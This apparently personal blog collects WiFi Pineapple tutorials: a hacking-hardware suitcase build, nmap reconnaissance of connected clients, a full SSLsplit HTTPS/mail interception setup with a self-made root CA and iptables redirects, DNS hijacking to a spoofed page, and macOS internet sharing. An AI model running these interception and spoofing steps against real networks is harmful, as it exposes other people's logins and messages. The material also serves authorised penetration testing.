Pineapple

Suitcase’s full of fun

This time I am not writing a tutorial on software. I would like to introduce you to my DIY project here. At a later point in time, however, I will focus on the newly used and partly self-developed software deeper.

Why this little project?

Over the years I have accumulated various electronic devices, cables and lots of other electrical scrap. Always storing it neatly is hell (I hate cardboard or plastic boxes). In addition, I do not live alone and should actually take all other people in the household into account. So I was looking for a better solution for my beloved girlfriend, my dog ​​(who also likes to eat things) and of course my self. In addition, everything should be tidy, ready to hand and mobile. When I then remembered my training as an electrician (especially on my toolbox), it quickly became clear to me which solution would be suitable for me. Different Suitcases made of aluminum (light and stable), where each of them have slightly different scope.

DIY Suitcase closed

What’s in there?

Actually there are several suitcases with different contents (depending on what I have planned). I would like to show you now, two of my personal favorites here.

Suitcase 1

This called by myself the RadioBox.

RadioBox open
  • Raspberry Pi 4 Model B/8GB
  • Yardstick One (incl. ANT700 antenna)
  • Ubertooth One (incl. 2.4 GHz antenna)
  • ALFA Atheros (AWUS036NHA)
  • BashBunny + RubberDucky
  • GL.iNet GL-AR300M (Shadow) Mini VPN Router
  • Fresh’n’Rebel Powerbank (18000 mAh)
  • external USB SSD
  • HackRF One (incl. ANT500)
  • Waveshare monitor FHD (12.5inch, 1920×1080 pixels, IPS screen)

Suitcase 2

This called by myself the Hak5Box

Hak5Box open
  • Raspberry Pi 4 Model B/8GB
  • Keysy + SharkJack + KeyLogger
  • OM.G Cabel’s + Cable Programmer + Malicious cable detector
  • WiFi Pineapple (M7)
  • Alfa Network APA-M04 7dBi WLAN antenna (2,4 GHz)
  • Fresh’n’Rebel Powerbank (18000 mAh)
  • Waveshare monitor FHD (12.5inch, 1920×1080 pixels, IPS screen)

In addition, all cases are filled with brackets and foam so that the connecting cables are not visible (this is not shown in the pictures) and each device has a specific place.

Do you want such suitcases, too?

If you also want one (or more) suitcases and don’t have the time or inclination to build them yourself – just contact me! We can talk about it.

Note: It is important to know that each case and its contents are freely configurable (but it should fit).

Gather STA informations with Wifi Pineapple

Some STA’s (stations) are connected to your AP (access point) and you need now more informations about them? No Problem! In this tiny tutorial I will show some command line possibilities. Together we will look who is connected, will try to detect the OS (incl. ports and services). Important is that for this examples your need to share internet connect to Wifi Pineapple, otherwise downloads/installations will not work.

Objectives

With different command line technics we actively gather information from connected STA’s.

Step 1: install nmap

As usual, the installation via opkg is very simple. Update list of available packages, search for package, read about dependencies and start the installation.

# update list of available packages
$ opkg update

# search for package
$ opkg list nmap

# get some informations
$ opkg info nmap

# check if dependencies are already installed
$ opkg status libpcap1

# install all needed packages
$ opkg install libpcap1 nmap

# verify installation
$ nmap --help

Step 2: get connected clients via command line

With following nmap commands you could start to detect STA’s, but to be honest this is slow and not really the optimal solution. But I will show them.

# layer 2 discovery (IP range)
$ nmap -PR -sn 172.16.42.1-255

# layer 3 discovery (IP range)
$ nmap -PE -sn 172.16.42.1-255

# layer 4 (udp) discovery (IP range)
$ nmap -PU53 -sn 172.16.42.1-255

# layer 4 (tcp) discovery (IP range)
$ nmap -PA80 -sn 172.16.42.1-255

# find all Netbios servers (on subnet)
$ nmap -sV -v -p 139,445 172.16.42.0/24

If you tried out, you feel already that this cannot the best way. With iw or iwinfo commands we found them much faster. To get fast the IP you could grep inside the file /tmp/dhcp.leases.

# show STA's via iw
$ iw dev wlan0 station dump

# show STA's via iwinfo
$ iwinfo wlan0 assoclist

# get specific IP via dhcp.leases
$ cat /tmp/dhcp.leases | grep -i '70:48:0F:C3:31:7A' | cut -d ' ' -f3

Step 3: run nmap against specific client

Now the nmap scans will be used only for specific STA’s. Here are a few scan command examples.

# classical ping
$ nmap -PE 172.16.42.x

# scanning the entire port range
$ nmap -v -p- 172.16.42.x

# detect services
$ nmap -v -sV 172.16.42.x

# detect OS
$ nmap -v -O 172.16.42.x

# detect services and OS
$ nmap -v -O -sV 172.16.42.x

# aggressive scan (includes -O, -sV, -sC and --traceroute)
$ nmap -v -A 172.16.42.x

You need to find the best parameters for yourself but the output in combinations with tools like searchsploit (GitHub) it can be very powerful.

Wifi Pineapple and SSLsplit

Many people complain about that they are not able to run SSLsplit on Wifi Pineapple. As you may know from my previous Pineapple tutorials, I will try to explain the solution now, without the usage of any additional module. All needed steps for installation, configuration and execution need the enabled internet sharing!

Objectives

In this example you will learn how to setup and run SSLsplit on Wifi Pineapple.

Step 1: install needed packages

SSH into Wifi Pineapple device and install all needed software with Opkg Package Manager.

# update list of available packages
$ opkg update

# install needed packages
$ opkg install sslsplit
$ opkg install openssl-util
$ opkg install libevent2
$ opkg install libevent2-core
$ opkg install libevent2-extra
$ opkg install libevent2-openssl
$ opkg install libevent2-pthreads

Step 2: create directories and configurations

Like the module would create directories and configuration files, we do exactly the same. So we could install the module later, too.

# create need folders
$ mkdir -p /pineapple/modules/SSLsplit/cert
$ mkdir -p /pineapple/modules/SSLsplit/rules
$ mkdir -p /pineapple/modules/SSLsplit/log

# create iptables and openssl.cnf files
$ vi /pineapple/modules/SSLsplit/rules/iptables
$ vi /pineapple/modules/SSLsplit/cert/openssl.cnf

# create sslsplit configuration
$ touch /etc/config/sslsplit

# add content
$ echo "config sslsplit 'module'" > /etc/config/sslsplit

# check if ip4 forward is enabled
$ cat /proc/sys/net/ipv4/ip_forward

# enable ip4 forward (if not enabled)
$ echo '1' > /proc/sys/net/ipv4/ip_forward

# show help (optional)
$ sslsplit -h

The content of iptables

##################################################################
# Certain packets are redirected to the local port 8080 and 8443 #
##################################################################

## Plain text HTTP traffic (80) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

## WhatsApp (5222) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 8080

## SSL-based HTTPS traffic (443) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

## IMAP over SSL (993), SMTP over SSL (465 and 587) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443

The content of openssl.cnf

#
# OpenSSL configuration file.
#

dir						= .

[ req ]
distinguished_name = reqdn

[ reqdn ]

[ v3_ca ]
basicConstraints        = CA:TRUE
subjectKeyIdentifier    = hash
authorityKeyIdentifier  = keyid:always,issuer:always

Step 3: generate needed certificates

# generate an RSA private key
$ openssl genrsa -out /pineapple/modules/SSLsplit/cert/certificate.key 1024

# generat PKCS#10 certificate
$ openssl req -new -nodes -x509 -sha1 -out /pineapple/modules/SSLsplit/cert/certificate.crt -key /pineapple/modules/SSLsplit/cert/certificate.key -config /pineapple/modules/SSLsplit/cert/openssl.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650

# verify files generated (optional)
$ ls -la /pineapple/modules/SSLsplit/cert/

Step 4: finalize installation and configuration

These steps are optional but are recommended.

# set UCI values
$ uci set sslsplit.module.installed=1

# write UCI changes
$ uci commit sslsplit.module.installed

# show UCI configuration (optional)
$ uci show sslsplit

# reboot wifi pineapple device
$ reboot

Step 5: set iptables

The following content describes how you need to configure the iptables before you start SSLsplit.

# save current iptables rules
$ iptables-save > /pineapple/modules/SSLsplit/rules/saved

# clean iptables
$ iptables -X
$ iptables -F
$ iptables -t nat -F
$ iptables -P INPUT ACCEPT
$ iptables -P FORWARD ACCEPT
$ iptables -P OUTPUT ACCEPT

# add rules
$ sh /pineapple/modules/SSLsplit/rules/iptables

$ iptables -t nat -A POSTROUTING -j MASQUERADE

Step 6: run SSLsplit

# execute sslsplit
$ sslsplit -D -l /pineapple/modules/SSLsplit/connections.log -L /pineapple/modules/SSLsplit/log/output.log -k /pineapple/modules/SSLsplit/cert/certificate.key -c /pineapple/modules/SSLsplit/cert/certificate.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

# tail log files (optional)
$ tail -f /pineapple/modules/SSLsplit/connections.log /pineapple/modules/SSLsplit/log/output.log

Step 7: restore iptables

After you’r done, the following content show how to restore the iptables.

# clean iptables
$ iptables -F
$ iptables -X
$ iptables -t nat -F
$ iptables -t nat -X
$ iptables -t mangle -F
$ iptables -t mangle -X
$ iptables -P INPUT ACCEPT
$ iptables -P FORWARD ACCEPT
$ iptables -P OUTPUT ACCEPT

# restore iptables rules
$ iptables-restore < /pineapple/modules/SSLsplit/rules/saved

DNS Hijacking with Wifi Pineapple

If you tried out modules like DNSspoof or DNSMasqSpoof on your Wifi Pineapple and had no success, then this tutorial will help you now. I will try my best to show you here a simple (and working) solution. The way differs to other tutorials on internet but should enable you to progress in your daily hacking work.

Objectives

In this example you will learn the basics about DNS Hijacking on Wifi Pineapple (without any additional modules).

Precondition

The ready configured internet share to Wifi Pineapple like in this tutorial, as well a 2nd device (or Virtual Machine) and a running FakeAP (where we later connect).

Step 1: prepare local PHP file and start PHP build-in server

To keep it simple, create the fake target site (incl. server) on your local device. This saves ressources on Wifi Pineapple device and will help more to understand this hole topic.

# create local project
$ mkdir -p ~/Projects/LandingPage

# change into project directory
$ cd ~/Projects/LandingPage

# create index.php file
$ vi ~/Projects/LandingPage/index.php

# start simple PHP server
$ php -S 0.0.0.0:80 index.php

# verify inside local browser (optional)
$ open http://172.16.42.42/

Content of very simple PHP file

<?php
header('Content-Type: text/html; charset=UTF-8');
echo 'hello spoofed DNS victim';

If you understand how all works, have a look on setoolkit.

Step 2: change hosts file and flush DNS

The DNS redirection (example.com to local running server) on the Wifi Pineapple is very easy. Just connect with SSH, modify the hosts file and flush the DNS cache.

# ssh into Wifi Pineapple
$ ssh -C4 root@172.16.42.1

# edit hosts file
$ vi /etc/hosts

# clear DNS cache
$ killall dnsmasq && /etc/init.d/dnsmasq start

# verify (optional)
$ nslookup example.com

# download website (optional)
$ wget example.com -O /tmp/index.html

# view file content (optional)
$ cat /tmp/index.html

The /etc/hosts file after modify it (2nd line).

127.0.0.1 localhost
172.16.42.42 example.com

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

However, since there are strong restrictions with this type (for example wildcards are not possible), you should use the DNSMasq configuration “addn-hosts” later. But for now it’s fine.

Step 3: flush DNS and connect to Wifi

Now you can flush the DNS on your device or vm (STA) load the page (example.com). If everything works perfectly you should see now the following content in your browser.

Fake response:

Content for spoofed DNS

Real response:

Response for not spoofed DNS

Share internet from macOS to Wifi Pineapple (Part 2)

Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the network configuration (NAT subnet configurations) so that we can use internet sharing on macOS inside “172.16.42.x” network.

Objectives

Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).

Step 1: Prepare for next steps

If you have “Internet Sharing” enabled, now you must switch it off!

Turn on the Wifi Pineapple device and connect via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, following commands should run successful.

# ping device (optional)
$ ping -c 1 172.16.42.1

# show wifi pineapple network settings (optional)
$ ssh root@172.16.42.1 -C 'uci show network'

# start browser session (optional)
$ open http://172.16.42.1:1471

Step 2: Configure default subnet

The property list (com.apple.nat.plist) is like a contract between the “Sharing preferences pane” and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties, which follow in this tutorial, are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I choose value 172.16.42.10.

# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist

# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak

# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10

# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100

# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0

Step 3: Network configuration

We will deal with 2 interfaces locally (enX and bridge100). Now we configure the “enX” IP first. We do this simply via “Network preferences”. Depending to your Wifi Pineapple device you should see following services:

  • NANO: AX88x72A
  • TETRA: USB 10/100 LAN

Select the service and configure like in picture.

macOS - Wifi Pineapple IP configuration

Now change the network service order.

macOS - Wifi Pineapple network service order

After saving, we quickly check everything.

# check interface (in my case it's en5)
$ ifconfig en5                
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255

# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable

# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist

Step 4: Start Internet Sharing

Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure as in picture.

macOS - Wifi Pineapple internet share

Step 5: Set bridge100 interface IP

Back to the terminal, here the interface “bridge100” should be visible now. This interface we assign the IP 172.16.42.42.

# show interface information (optional)
$ ifconfig bridge100

# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up

That’s it already! Via “Bulletins” you can verify.

Wifi Pineapple Dashboard

BTW … Take a look at the following local files, with and without Internet sharing!

# read config file for DHCP
$ defaults read /etc/bootpd.plist

# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist

Share internet from macOS to Wifi Pineapple

I have been using the Wifi Pineapple Nano by Hak5 for a long time. What can I say – very, very cool tiny device. Since I am also a macOS user, I would like to show in this tutorial how I share my internet (Wifi to USB). There are various options but with this I have currently achieved the best results.

Important: You should carry out all firmware upgrades beforehand, since the settings (which I will show you soon) will be overwritten again.

Objectives

I would like to connect my Macbook to the Internet via WiFi and then make it available to the Wifi Pineapple via USB. So here both devices should be able to use the Internet without network conflicts.

Change Wifi Pineapple network

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple device via SSH
$ ssh root@172.16.42.1

# backup network file
$ cp /etc/config/network /etc/config/network.bak

# show all settings (optional)
$ uci show

# show network settings (optional)
$ uci show network

# change ip with UCI configuration tool
$ uci set network.lan.ipaddr='192.168.2.10'

# change gateway with UCI configuration tool
$ uci set network.lan.gateway='192.168.2.1'

# save changes
$ uci commit

# reboot device
$ reboot

The first steps of the configuration have been carried out. However, you still cannot connect to the device or share the internet!

Modify macOS network configuration

Now you have to configure the macos network dhcp with manual address (network.lan.gateway 192.168.2.1). To do this, open the network settings and select the Wifi Pineapple (AX88x72A). Select “DHCP with manual address” in the dropdown and assign the IP (next to Configure IPv4).

Configure device as DHCP with manual address.

You should also change the arrangement of your available network connections (devices). Click the gear icon and select “Set Service Order”. At the top should be the standard wifi followed by Wifi Pineapple.

set service order

After a short time, the settings should have been accepted.

Wifi to USB internet sharing

Now we are making the internet available from Wifi to Wifi Pineapple (USB). Launch Internet Sharing under System Preferences. On “Share your connection from” select the Wifi and on “To computers using” select the Wifi Pineapple.

share internet from Wifi to USB

Done … let’s verify all configurations.

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple via SSH
$ ssh root@192.168.2.10

# run simple ping (optional)
$ ping -c 1 google.com

# exit SSH connection to Pineapple
$ exit

# open browser
$ open http://192.168.2.10:1471

Note: The Browser URL is now http://192.168.2.10:1471 (network.lan.ipaddr 192.168.2.10)!

After login you can go to the Dashboard and check “Bulletins” which should show the latest news from wifipineapple.com.